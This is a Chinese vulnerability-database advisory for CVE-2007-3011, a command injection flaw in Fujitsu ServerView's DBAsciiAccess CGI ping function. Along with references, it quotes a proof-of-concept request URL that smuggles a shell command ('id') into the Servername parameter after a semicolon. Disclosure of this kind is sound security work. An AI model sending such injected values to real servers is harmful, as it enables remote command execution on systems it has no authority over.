Fujitsu ServerView DBASCIIAccess脚本远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113239 漏洞类型 输入验证
发布时间 2007-07-03 更新时间 2007-07-05
CVE编号 CVE-2007-3011 CNNVD-ID CNNVD-200707-062
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/30264
https://www.securityfocus.com/bid/24762
https://cxsecurity.com/issue/WLB-2007070013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-062
|漏洞详情
ServerView是用于进行自动分析和版本维护的资产管理工具。ServerView的Web接口处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程的权限执行任意命令。DBAsciiAccessCGI脚本提供了ping功能,该脚本Parameterlist参数的Servername子参数给出了所要ping的IP地址,但没有对这个IP地址执行任何检查。如果在IP后添加了拖尾分号,攻击者就可以注入任意shell命令并以Web服务器进程的权限执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/24762/info

Fujitsu ServerView is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.

Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. Successful attacks will compromise the application and underlying webserver; other attacks are also possible.

Versions prior to Fujitsu ServerView 4.50.09 are vulnerable. 

http://www.example.com/cgi-bin/ServerView/
SnmpView/DBAsciiAccess
?SSL=
&Application=ServerView/SnmpView
&Submit=Submit
&UserID=1
&Profile=
&DBAccess=ASCII
&Viewing=-1
&Action=Show
&ThisApplication=TestConnectivityFrame
&DBElement=ServerName
&DBValue=bcmes
&DBList=snism
&UserValue=
&DBTableList=SERVER_LIST
&Sorting=
&ParameterList=What--primary,,
OtherCommunity--public,,
SecondIP--,,
Timeout--5,,
Community--public,,
ServerName--bcmes,,
Servername--127.0.0.1;id;,, # vulnerable parameter
SType--Server
|受影响的产品
Fujitsu ServerView 4.50.8 Fujitsu ServerView 4.50.7 Fujitsu ServerView 4.50.6 Fujitsu ServerView 4.50.5 Fujitsu ServerView 4.50.4 Fujitsu ServerView 4.50.3
|参考资料

来源:BID
名称:24762
链接:http://www.securityfocus.com/bid/24762
来源:BUGTRAQ
名称:20070704Fujitsu-SiemensServerViewRemoteCommandExecution
链接:http://www.securityfocus.com/archive/1/archive/1/472800/100/0/threaded
来源:MISC
链接:http://www.redteam-pentesting.de/advisories/rt-sa-2007-002.php
来源:SECUNIA
名称:25944
链接:http://secunia.com/advisories/25944
来源:OSVDB
名称:37835
链接:http://osvdb.org/37835
来源:XF
名称:serverview-servername-command-execution(35257)
链接:http://xforce.iss.net/xforce/xfdb/35257
来源:VUPEN
名称:ADV-2007-2441
链接:http://www.frsirt.com/english/advisories/2007/2441
来源:SREASON
名称:2858
链接:http://securityreason.com/securityalert/2858